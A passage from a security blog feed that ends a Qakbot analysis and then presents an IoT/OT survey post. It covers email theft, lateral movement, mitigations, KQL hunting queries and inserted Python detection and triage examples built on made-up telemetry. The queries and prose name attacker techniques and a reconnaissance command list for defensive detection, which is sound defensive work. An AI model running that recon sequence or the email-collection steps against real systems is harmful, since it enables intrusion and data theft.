From there, ping.exe is used to copy dozens of email message files and save them in an “Email Storage” folder. These email messages are saved with a sequential naming scheme, starting with 1.eml and increasing by one for as many email messages as the attacker copies. We have identified instances where the attacker copied out over 100 message files from a single device.

Once the copied email files are exfiltrated, the evidence of the action is deleted by removing the “Email Storage” folder using the rmdir command.

Additional payloads, lateral movement, and ransomware

As is the case with many malware variants today, getting Qakbot onto a device is frequently just the first step in what ends up being a larger attack. Attackers can use the access from Qakbot infections to deliver additional payloads or sell access to other threat actors who can use the purchased access for their objectives.

In many cases, attackers will expand the scope of their attack by using credentials obtained in earlier stages of the attack to move laterally throughout the network. In several instances, attackers would move laterally using Windows Management Instrumentation (WMI) and drop a malicious DLL on the newly accessed device. From there, the attacker will run the same series of discovery commands as they did on the initial access device and will conduct further credential theft.

In other instances, other malicious files are dropped in conjunction with the malicious DLL. For example, several BAT files that were specifically designed to turn off security tools on the affected device were dropped before dropping the malicious DLL. These slight differences in the attack chain are evidence of multiple actors using Qakbot for lateral movement.

In addition to lateral movement, attackers frequently drop additional payloads on affected devices, especially Cobalt Strike. Qakbot has a Cobalt Strike module, and actors who purchase access to machines with prior Qakbot infections may also drop their own Cobalt Strike beacons and additional payloads. Using Cobalt Strike lets attackers have full hands-on-keyboard access to the affected devices, enabling them to perform additional discovery, find high-value targets on the network, move laterally, and drop additional payloads, especially human-operated ransomware variants such as Conti and Egregor.

Resurging and evolving threats require coordinated threat defense

Qakbot’s continued prevalence in the threat landscape demands comprehensive protection capable of detecting and stopping this malware, its components, and other similar threats at every stage of the attack chain: email delivery, network activity, endpoint behavior, and follow-on attacker activities. Microsoft 365 Defender provides coordinated defense using multiple layers of dynamic protection technologies—including machine learning-based protection—and correlating threat data from email, endpoints, identities, and cloud apps. It is also backed by a global network of threat experts who continuously monitor the threat landscape for new, resurging, and evolving attacker tools and techniques.

Microsoft Defender for Office 365 detects and blocks emails that attempt to deliver Qakbot. Safe Links and Safe Attachments provide real-time protection by leveraging a built-in sandbox that examines and detonates links and attachments in messages before they get delivered to target recipients. However, for those messages without such artifacts, Microsoft Defender SmartScreen in Microsoft Edge and other web browsers that support it blocks the malicious websites and prevents downloading the malicious Excel file on devices.

On endpoints, attack surface reduction rules detect and block common attack techniques used by Qakbot and subsequent threats that may result from its activities. Endpoint detection and response (EDR) capabilities detect malicious files, malicious behavior, and other related events before and after execution. Network protection also blocks subsequent attempts by Qakbot to connect to malicious domains and IP addresses, and Advanced hunting lets defenders create custom detections to proactively find this malware and other related threats.

Defenders can also do the following mitigation steps to reduce the impact of Qakbot in their organizations:

  • Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use Office 365 security for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Office 365 to recheck links on click.
  • Enable Zero-hour auto purge (ZAP) in Exchange Online, which is an email protection capability that retroactively detects and neutralizes malicious messages that have already been delivered in response to newly acquired threat intelligence.
  • Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Stop malicious XLM or VBA macros by ensuring runtime macro scanning by Windows Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to Enable for All Files or Enable for Low Trust Files.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
  • Turn on tamper protection features to prevent attackers from stopping security services.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Use device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.
  • Use multi-factor authentication (MFA) to mitigate credential theft and prevent attacker access. Keep MFA always-on for privileged accounts and apply risk-based MFA for normal accounts. Consider transitioning to a passwordless primary authentication method, such as Azure MFA, certificates, or Windows Hello for Business.
  • Run realistic, yet safe, simulated phishing and password attack campaigns in your organization using Attack Simulator for Microsoft Defender for Office 365. Run spear-phishing (credential harvest) simulations to train end users against clicking URLs in unsolicited messages and disclosing their credentials.
  • Educate end users about identifying lures in spear-phishing emails and watering hole attacks, protecting personal and business information in social media, and filtering unsolicited communication. Encourage users to report reconnaissance attempts and other suspicious activity.

Learn how you can stop attacks through automated, cross-domain security with Microsoft 365 Defender.

Microsoft 365 Defender Threat Intelligence Team

Appendix

Microsoft researchers published the following threat analytics reports, which are available to Microsoft 365 Defender customers through the Microsoft 365 security center:

These reports serve as a good starting point for organizations to understand these active attacks, determine if they are affected, and investigate related incidents and alerts. The reports provide and consolidate real-time data aggregated from across Microsoft 365 Defender, indicating the all-up impact of the threat to the organization.

The following sections provide the specific Microsoft 365 Defender detections that can help surface Qakbot and related threats.

Antivirus

Microsoft Defender Antivirus detects Qakbot installers as the following malware:

Qakbot downloader

Qakbot implant

Qakbot behavior

Additional detections based on activity group behavior

Due to Qakbot’s high likelihood of transitioning to human-operated attack behaviors, including data exfiltration, lateral movement, and ransomware by multiple actors, the detections seen after infection can vary widely. During the activity described in this report, at least one major activity group was provided Qakbot access after initial infection, but other groups have been known to purchase access, so any initial infection indicated by advanced hunting queries, behavior, or Qakbot infection should be fully investigated.

Endpoint detection and response (EDR)

Alerts with the following titles in the security center can indicate threat activity on your network related directly to the material in this report covering Qakbot initial infection and subsequent human-operated or ransomware activity:

  • Qakbot malware
  • Qakbot credential stealer
  • Qakbot download URL
  • Qakbot network infrastructure

Email security

Microsoft Defender for Office 365 offers enhanced solutions for blocking and identifying malicious emails. In the email entity page, administrators can get enhanced information on emails in a unified view. Administrators can view known campaigns impacting inboxes and investigate malicious emails by drilling down to view all attachments or URL detonation details from dynamic analysis.

The following dynamic detonation signature may indicate threat activity associated with Qakbot. By utilizing email Campaigns view, you can filter based on campaign subtype for the following signals. These signals, however, can be triggered by unrelated threat activity:

  • Downloader_Macro_Donoff_ZGA

Advanced hunting

The following Advanced Hunting Queries are accurate as of this writing. For the most up-to-date queries, visit aka.ms/QakbotAHQ.

To locate possible exploitation activity, run the following queries in Microsoft 365 Defender.

Craigslist impersonation domains lead to XLS download

Use this query to locate devices connecting to malicious domains registered to impersonate Craigslist.org. These domains act as redirectors which direct the target to a malicious XLS download.

DeviceNetworkEvents
| where RemoteUrl matches regex @"abuse\.[a-zA-Z]\d{2}-craigslist\.org"

Qakbot-favored process execution after anomalous Excel spawning

Use this query to find Excel launching anomalous processes consistent with Qakbot payloads, which contain additional markers from recent Qakbot executions. The presence of such anomalous processes indicates that the payload was delivered and executed, though reconnaissance and successful implantation have not yet been completed at that point.

DeviceProcessEvents
| where InitiatingProcessParentFileName has "excel.exe" or InitiatingProcessFileName =~ "excel.exe"
| where InitiatingProcessFileName in~ ("excel.exe","regsvr32.exe")
| where FileName in~ ("regsvr32.exe", "rundll32.exe")
| where ProcessCommandLine has @"..\"

Qakbot reconnaissance activities

Use this query to find reconnaissance and beaconing activities after code injection occurs. Reconnaissance commands are consistent with the current version of Qakbot and occur automatically to exfiltrate system information. This data, once exfiltrated, will be used to prioritize human-operated actions.

DeviceProcessEvents
| where InitiatingProcessFileName == InitiatingProcessCommandLine
| where ProcessCommandLine has_any (
"whoami /all","cmd /c set","arp -a","ipconfig /all","net view /all","nslookup -querytype=ALL -timeout=10",
"net share","route print","netstat -nao","net localgroup")
| summarize dcount(FileName), make_set(ProcessCommandLine) by DeviceId,bin(Timestamp, 1d), InitiatingProcessFileName, InitiatingProcessCommandLine
| where dcount_FileName >= 8

Qakbot email stealing by ping.exe

Use this query to find email stealing activities run by Qakbot, which uses “ping.exe -t 127.0.0.1” to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indicates that the malware completed a large portion of its automated activity without interruption.

DeviceFileEvents
| where InitiatingProcessFileName =~ 'ping.exe'
| where FileName endswith '.eml'

General attempts to access local email store

Use this query to find attempts to access files in the local path containing Outlook emails.

DeviceFileEvents
| where FolderPath hasprefix "EmailStorage"
| where FolderPath has "Outlook"
| project FileName, FolderPath, InitiatingProcessFileName,
InitiatingProcessCommandLine, DeviceId, Timestamp

Email collection for exfiltration

Use this query to find attempts to copy and store emails for later exfiltration.

DeviceFileEvents
| where InitiatingProcessFileName =~ 'ping.exe' and InitiatingProcessCommandLine == 'ping.exe -t 127.0.0.1'
and InitiatingProcessParentFileName in~('msra.exe', 'mobsync.exe') and FolderPath endswith ".eml"
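
To show how the reconnaissance query and the email collection query above behave on concrete telemetry, here is an added Python example (not code from the original post or from Microsoft) that re-implements both rules over a small set of constructed process and file events and then correlates the two by device. The event dictionaries, device names, timestamps and paths are assumptions modelled on the DeviceProcessEvents and DeviceFileEvents columns the queries use; substring matching stands in for KQL’s term-based has_any.

```python
from collections import defaultdict

# Discovery commands listed in the post's "Qakbot reconnaissance activities" query.
RECON_COMMANDS = (
    "whoami /all", "cmd /c set", "arp -a", "ipconfig /all", "net view /all",
    "nslookup -querytype=ALL -timeout=10", "net share", "route print",
    "netstat -nao", "net localgroup",
)
RECON_THRESHOLD = 8  # the query's "dcount_FileName >= 8"
EMAIL_THEFT_PARENTS = ("msra.exe", "mobsync.exe")  # in~('msra.exe', 'mobsync.exe')
PING_LOCALHOST = "ping.exe -t 127.0.0.1"            # compared with == (case-sensitive)


def recon_hits(process_events):
    """Reconnaissance query over DeviceProcessEvents-like dicts: group by
    (DeviceId, day, parent image, parent command line) like the KQL summarize and
    keep groups with >= 8 distinct child FileNames. Returns {key: set(commands)}."""
    groups = defaultdict(lambda: {"files": set(), "cmds": set()})
    for ev in process_events:
        # The injected parent was started with a bare image name and no arguments.
        if ev["InitiatingProcessFileName"] != ev["InitiatingProcessCommandLine"]:
            continue
        cmd = ev["ProcessCommandLine"].lower()
        if not any(r.lower() in cmd for r in RECON_COMMANDS):
            continue
        key = (ev["DeviceId"], ev["Timestamp"][:10],  # bin(Timestamp, 1d)
               ev["InitiatingProcessFileName"], ev["InitiatingProcessCommandLine"])
        groups[key]["files"].add(ev["FileName"].lower())
        groups[key]["cmds"].add(ev["ProcessCommandLine"])
    return {k: v["cmds"] for k, v in groups.items()
            if len(v["files"]) >= RECON_THRESHOLD}


def email_theft_hits(file_events):
    """'Email collection for exfiltration' query over DeviceFileEvents-like dicts:
    .eml writes by 'ping.exe -t 127.0.0.1' whose parent is msra.exe or mobsync.exe."""
    return [ev for ev in file_events
            if ev["InitiatingProcessFileName"].lower() == "ping.exe"
            and ev["InitiatingProcessCommandLine"] == PING_LOCALHOST
            and ev["InitiatingProcessParentFileName"].lower() in EMAIL_THEFT_PARENTS
            and ev["FolderPath"].lower().endswith(".eml")]


def devices_with_both_stages(process_events, file_events):
    """Devices where both automated stages fired (recon, then email collection);
    these are the ones to triage first."""
    recon = {k[0] for k in recon_hits(process_events)}
    theft = {ev["DeviceId"] for ev in email_theft_hits(file_events)}
    return sorted(recon & theft)


def _pe(device, ts, file_name, cmd, parent="msra.exe", parent_cmd="msra.exe"):
    """Build one constructed DeviceProcessEvents-style record."""
    return {"DeviceId": device, "Timestamp": ts, "FileName": file_name,
            "ProcessCommandLine": cmd, "InitiatingProcessFileName": parent,
            "InitiatingProcessCommandLine": parent_cmd}


def _fe(device, path, parent="ping.exe", parent_cmd=PING_LOCALHOST, gparent="msra.exe"):
    """Build one constructed DeviceFileEvents-style record; FolderPath carries the
    full path, as the post's 'FolderPath endswith ".eml"' query assumes."""
    return {"DeviceId": device, "FolderPath": path, "FileName": path.rsplit("\\", 1)[-1],
            "InitiatingProcessFileName": parent, "InitiatingProcessCommandLine": parent_cmd,
            "InitiatingProcessParentFileName": gparent}


# Constructed sample telemetry; device names, times and paths are made up.
SAMPLE_PROCESS_EVENTS = [
    # dev-a: the full discovery burst from an argument-less, injected msra.exe
    _pe("dev-a", "2021-11-02T09:00:01Z", "whoami.exe", "whoami /all"),
    _pe("dev-a", "2021-11-02T09:00:02Z", "cmd.exe", "cmd /c set"),
    _pe("dev-a", "2021-11-02T09:00:03Z", "arp.exe", "arp -a"),
    _pe("dev-a", "2021-11-02T09:00:04Z", "ipconfig.exe", "ipconfig /all"),
    _pe("dev-a", "2021-11-02T09:00:05Z", "net.exe", "net view /all"),
    _pe("dev-a", "2021-11-02T09:00:06Z", "nslookup.exe", "nslookup -querytype=ALL -timeout=10"),
    _pe("dev-a", "2021-11-02T09:00:07Z", "net.exe", "net share"),
    _pe("dev-a", "2021-11-02T09:00:08Z", "route.exe", "route print"),
    _pe("dev-a", "2021-11-02T09:00:09Z", "netstat.exe", "netstat -nao"),
    _pe("dev-a", "2021-11-02T09:00:10Z", "net.exe", "net localgroup"),
    # dev-b: an admin's interactive shell; the parent has arguments, so it is skipped
    _pe("dev-b", "2021-11-02T10:00:00Z", "ipconfig.exe", "ipconfig /all", "cmd.exe", "cmd.exe /k"),
    _pe("dev-b", "2021-11-02T10:00:05Z", "netstat.exe", "netstat -nao", "cmd.exe", "cmd.exe /k"),
    # dev-c: only three distinct discovery binaries, below the threshold of 8
    _pe("dev-c", "2021-11-02T11:00:00Z", "whoami.exe", "whoami /all", "mobsync.exe", "mobsync.exe"),
    _pe("dev-c", "2021-11-02T11:00:01Z", "arp.exe", "arp -a", "mobsync.exe", "mobsync.exe"),
    _pe("dev-c", "2021-11-02T11:00:02Z", "route.exe", "route print", "mobsync.exe", "mobsync.exe"),
]

SAMPLE_FILE_EVENTS = [
    _fe("dev-a", r"C:\Users\user\AppData\Local\Temp\EmailStorage\1.eml"),
    _fe("dev-a", r"C:\Users\user\AppData\Local\Temp\EmailStorage\2.eml"),
    _fe("dev-a", r"C:\Users\user\AppData\Local\Temp\EmailStorage\3.eml"),
    # same ping.exe chain but not a message file: not a hit
    _fe("dev-a", r"C:\Users\user\AppData\Local\Temp\EmailStorage\index.txt"),
    # Outlook saving a message on its own: legitimate, not a hit
    _fe("dev-b", r"C:\Users\user\Documents\saved.eml", "outlook.exe", "outlook.exe", "explorer.exe"),
]
```

Note that net view, net share and net localgroup all share the FileName net.exe, so the threshold of 8 distinct FileNames effectively requires every listed discovery binary to have run under the same argument-less parent on the same day.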


The post A closer look at Qakbot’s latest building blocks (and how to knock them down) appeared first on Microsoft Security Blog.

New research shows IoT and OT innovation is critical to business but comes with significant risks

December 8th, 2021

The need for much improved IoT and operational technology (OT) cybersecurity became clearer this year with recent attacks on network devices,1 surveillance systems,2 an oil pipeline,3 and a water treatment facility,4 to name a few examples.

To better understand the challenges customers are facing, Microsoft partnered with the Ponemon Institute to produce empirical data to help us better understand the state of IoT and OT security from a customer’s perspective. With this data, we hope to better target our cybersecurity investments and to improve the efficacy within Microsoft Defender for IoT, and our other IoT-related products. Ponemon conducted the research by surveying 615 IT, IT security, and OT security practitioners across the United States.

To get an overview of the key findings from the 2021 The State of IoT and OT Cybersecurity in the Enterprise, download the full report.

IoT adoption is critical despite significant security challenges

The research showed that a large majority of respondents believe that IoT and OT adoption is critical to future business success. As a result, they are advancing IoT and OT projects as a key priority.

  • 68 percent of respondents say senior management believes IoT and OT are critical to supporting business innovation and other strategic goals.
  • 65 percent of respondents say senior management has made it a priority for IT and OT security practitioners to plan, develop, or deploy IoT and OT projects to advance business interests.

Within this group, only a small minority of organizations slowed, limited, or stopped IoT and OT projects even though a majority believe that generally these types of devices are not built with security in mind and that they represent one of the least secured aspects of their IT and OT infrastructure.

  • 31 percent of IT security practitioners have slowed, limited, or stopped the adoption of IoT and OT projects due to security concerns.
  • 55 percent of respondents do not believe IoT and OT devices have been designed with security in mind.
  • 60 percent of respondents say IoT and OT security is one of the least secured aspects of their IT and OT infrastructure.

Based on the data, it appears that business interests are currently taking priority over the increased security risks that organizations assume, as they advance their IoT and OT projects. This puts security and risk leaders in a difficult place and explains why IoT and cyber-physical systems security has become their top concern for the next three to five years.5

“We believe this unique research highlights the obstacles organizations face as they use IoT and OT to drive business innovation with technologies that are more easily compromised than traditional endpoints,” said Dr. Larry Ponemon, Chairman and Founder of Ponemon Institute. “On a positive note, a vast majority of security and risk leaders recognize the threat and have made shoring up their IoT and OT defenses a top priority for the next 12 to 24 months.”

Outdated IoT and OT assumptions are putting organizations at risk

In the past, there was a common assumption about IoT and OT devices that is no longer true. It was assumed that IoT and OT devices were typically segmented from traditional endpoints (workstations, servers, and mobile) or that they were deployed within separate air-gapped networks. The research confirmed that devices on IT and OT networks are frequently connected directly or indirectly to the internet, making them targets that can be breached from outside of the organization. The latest evolution to the Mozi attack1 is a great example of how a business network can be breached through network gear running on the edge of business networks.

  • 51 percent of OT networks are connected to corporate IT (business) networks, like SAP and remote access.
  • 88 percent of respondents say their enterprise IoT devices are connected to the internet—for instance, for cloud printing services.
  • 56 percent of respondents say devices on their OT network are connected to the internet for scenarios like remote access.

It’s critical that these dated assumptions are removed from organizational thinking so that proper mitigations can be put in place.

Key security challenges for IoT and OT devices

When it comes to securing IoT and OT devices, the top challenge is related to visibility. Per the research, only a small subset of respondents shared that they had a complete view of all their IoT and OT asset inventory.

  • 29 percent of respondents mentioned that their organizations have a complete inventory of IoT and OT devices. Among them, they have an average of 9,685 devices.

But visibility isn’t just about building a complete asset inventory. It’s also about gaining visibility into the security posture of each IoT and OT device. Questions like “Is the device optimally configured for security,” “Are there any known vulnerabilities in the device’s firmware,” “Is the device communicating or connected directly to the internet,” and “Is the device patched with the latest firmware build?” are some of the questions that organizations need answers to but struggle with for their IoT and OT devices.

  • 42 percent of respondents claimed they lack the ability to detect vulnerabilities on IoT and OT devices.
  • 64 percent of respondents have low or average confidence that IoT devices are patched and up to date.

Another dimension of visibility that customers are seeking solutions for is related to the ability for organizations to become aware of IoT and OT devices that are involved in attacks. Most of the survey respondents have low to average confidence that the tools they have deployed will be successful in detecting compromised devices.

  • 61 percent have low or average confidence in the ability to identify whether IoT devices are compromised.

A further aspect of visibility is that customers struggle to determine efficiently how compromised IoT and OT devices fit into a broader end-to-end incident. To resolve an attack completely and decisively, organizations frequently fall back on manual processes to correlate the evidence and make sense of the whole attack. Meanwhile, attackers use that time to broaden the attack and get closer to their end goal.

  • 47 percent of respondents say their organizations are primarily using manual processes to identify and correlate impacted IoT and OT devices.
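The two visibility gaps above (posture questions that go unanswered per device, and manual correlation of IoT/OT devices into an end-to-end incident) can be illustrated with a small triage script. The example below is added here and is not code from the original post or from Microsoft Defender for IoT; every asset name, IP address, product key, firmware version and alert line in it is constructed, and the key=value alert format is an assumption rather than any real sensor's output. It answers the posture questions for each inventoried asset, then groups alerts from IT, IoT and OT sensors into incidents by pivoting on shared addresses inside a time window, and finally enriches each incident with the posture findings of the devices involved, which is the step the survey says is mostly done by hand today.

```python
"""Added example (not from the original post or from Defender for IoT):
posture triage over a constructed asset inventory plus greedy correlation of
constructed IT/IoT/OT alerts into incidents. All data below is made up."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Asset:
    name: str
    ip: str
    kind: str          # "it", "iot" or "ot"
    product: str       # key into the constructed firmware tables below
    firmware: str
    internet_exposed: bool
    default_creds: bool


# Constructed reference data. In practice this comes from vendor advisories
# or a vulnerability feed, not a hard-coded table.
LATEST_FIRMWARE = {"cam": "2.4.1", "plc": "5.0.0", "printer": "1.9.3"}
VULNERABLE_BUILDS = {("cam", "2.3.0"), ("plc", "4.2.1")}

# Constructed inventory: one IT workstation, a camera, a PLC and a printer.
ASSETS = [
    Asset("ws-finance-07", "10.0.1.15", "it", "workstation", "n/a", False, False),
    Asset("lobby-cam-02", "10.0.5.20", "iot", "cam", "2.3.0", True, True),
    Asset("line1-plc-01", "10.0.9.7", "ot", "plc", "4.2.1", False, False),
    Asset("print-floor3", "10.0.5.31", "iot", "printer", "1.9.3", True, False),
]

# Constructed alert lines in an assumed key=value shape (not a real format).
ALERT_LINES = [
    'ts=2021-12-01T10:00:00Z sensor=it src=10.0.1.15 dst=10.0.5.20 alert="admin_login_default_password"',
    'ts=2021-12-01T10:03:30Z sensor=iot src=10.0.5.20 dst=10.0.9.7 alert="modbus_port_scan"',
    'ts=2021-12-01T10:06:10Z sensor=ot src=10.0.5.20 dst=10.0.9.7 alert="unauthorized_plc_programming"',
    'ts=2021-12-01T14:00:00Z sensor=iot src=10.0.5.31 dst=203.0.113.9 alert="outbound_beacon"',
]


def version_tuple(v: str) -> tuple:
    return tuple(int(part) for part in v.split("."))


def posture_findings(asset: Asset) -> list:
    """Answer the posture questions for one asset; an empty list means no finding."""
    findings = []
    if asset.internet_exposed:
        findings.append("direct internet exposure")
    if asset.default_creds:
        findings.append("default credentials")
    if (asset.product, asset.firmware) in VULNERABLE_BUILDS:
        findings.append("known-vulnerable firmware")
    latest = LATEST_FIRMWARE.get(asset.product)
    if latest and version_tuple(asset.firmware) < version_tuple(latest):
        findings.append(f"firmware {asset.firmware} behind latest {latest}")
    return findings


ALERT_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_alert(line: str) -> dict:
    fields = {k: v.strip('"') for k, v in ALERT_RE.findall(line)}
    fields["ts"] = datetime.strptime(fields["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return fields


def correlate_alerts(lines, window=timedelta(minutes=15)) -> list:
    """Greedy correlation: an alert joins an open incident if it shares a source or
    destination address with it and arrives within `window` of the incident's last
    alert; otherwise it opens a new incident. Each incident is a dict with
    'alerts', 'hosts', 'sensors' and 'last'."""
    incidents = []
    for alert in sorted(map(parse_alert, lines), key=lambda a: a["ts"]):
        hosts = {alert["src"], alert["dst"]}
        for inc in incidents:
            if hosts & inc["hosts"] and alert["ts"] - inc["last"] <= window:
                inc["alerts"].append(alert)
                inc["hosts"] |= hosts
                inc["sensors"].add(alert["sensor"])
                inc["last"] = alert["ts"]
                break
        else:
            incidents.append({"alerts": [alert], "hosts": set(hosts),
                              "sensors": {alert["sensor"]}, "last": alert["ts"]})
    return incidents


def enrich_incidents(incidents, assets) -> list:
    """Attach inventory context (posture findings per involved device) to each incident."""
    by_ip = {a.ip: a for a in assets}
    report = []
    for inc in incidents:
        involved = [by_ip[ip] for ip in sorted(inc["hosts"]) if ip in by_ip]
        report.append({"sensors": sorted(inc["sensors"]),
                       "assets": {a.name: posture_findings(a) for a in involved},
                       "alerts": [a["alert"] for a in inc["alerts"]]})
    return report


if __name__ == "__main__":
    for item in enrich_incidents(correlate_alerts(ALERT_LINES), ASSETS):
        print(item)
```

With the constructed data the first three alerts, seen by three different sensors, collapse into one incident that walks from a workstation through a camera with default credentials and outdated firmware to an unauthorized PLC programming change, while the printer beacon stands alone. The window and the shared-address pivot are deliberately simple; a production correlation would also pivot on user, session and asset identity, which is where an integrated inventory pays off.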

IoT and OT attacks are not hypothetical

The Ponemon research shows that a substantial share of respondents are already encountering IoT and OT attacks. Nearly 40 percent told us they had experienced attacks in which IoT or OT devices were either the actual target (for example, halting production with human-operated ransomware) or were used as a foothold for a broader attack (for lateral movement, evading detection, or persistence). Most respondents expect these attacks to increase in the years to come.

  • 39 percent of respondents experienced a cyber incident in the past two years where an IoT or OT device was the target of the attack.
  • 35 percent of respondents say in the past two years their organizations experienced a cyber incident where an IoT device was used by an attacker to conduct a broader attack.
  • 63 percent of respondents say the volume of attacks will significantly increase.

One thing to keep in mind with these last three statistics is that the study also showed that customers have low to average confidence in their ability to detect when IoT and OT devices have been compromised. Given that, the real numbers are likely higher: an attack that was never detected cannot be reported.

The new Microsoft Defender for IoT is available now for your feedback

Last month at Ignite, we announced that Microsoft Defender for IoT, formerly Azure Defender for IoT, is adding agentless monitoring capabilities to help secure enterprise IoT devices connected to IT networks, such as Voice over Internet Protocol (VoIP) phones, printers, and smart TVs. This complements the product’s existing support for industrial systems and critical infrastructure like ICS/SCADA. Additionally, we announced that Defender for IoT is part of the Microsoft SIEM and XDR offering, which brings its AI, automation, and expertise to bear on complex multistage attacks that involve IoT and OT devices.

[Screenshot: an open investigation dashboard for PLC programming and related alerts.]

Figure 1. Deep contextual telemetry (like asset and connection details) combined with threat intelligence (like analytics rules, SOAR playbooks, and dashboards) from Section 52 helps analysts perform high-efficiency incident responses.

Microsoft Security would now like to invite you to try out the new public preview of the integrated solution that addresses the challenges surfaced in the Ponemon research, such as complete asset inventory, vulnerability management, threat detection, and correlation. Try the public preview functionality within the Microsoft 365 Defender console or within the Microsoft Defender for IoT experiences. We look forward to hearing and integrating your feedback for the new Microsoft Defender for IoT.

More details on the public preview and roadmap can be viewed in our Ignite session.

[Video: Accelerate digital transformation by securing your Enterprise IoT devices with Microsoft Defender for IoT, the Ignite session with Nir Krumer, Principal PM Manager, and Chris Hallum, Senior Product Marketing Manager.]

Figure 2. Nir Krumer, Principal Program Manager, and Chris Hallum, Senior Product Marketing Manager, discuss securing your Enterprise IoT devices with Microsoft Defender for IoT.

Learn more

More information on the current release of Microsoft Defender for IoT, which offers OT security, can be found in the following resources:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.




The post New research shows IoT and OT innovation is critical to business but comes with significant risks appeared first on Microsoft Security Blog.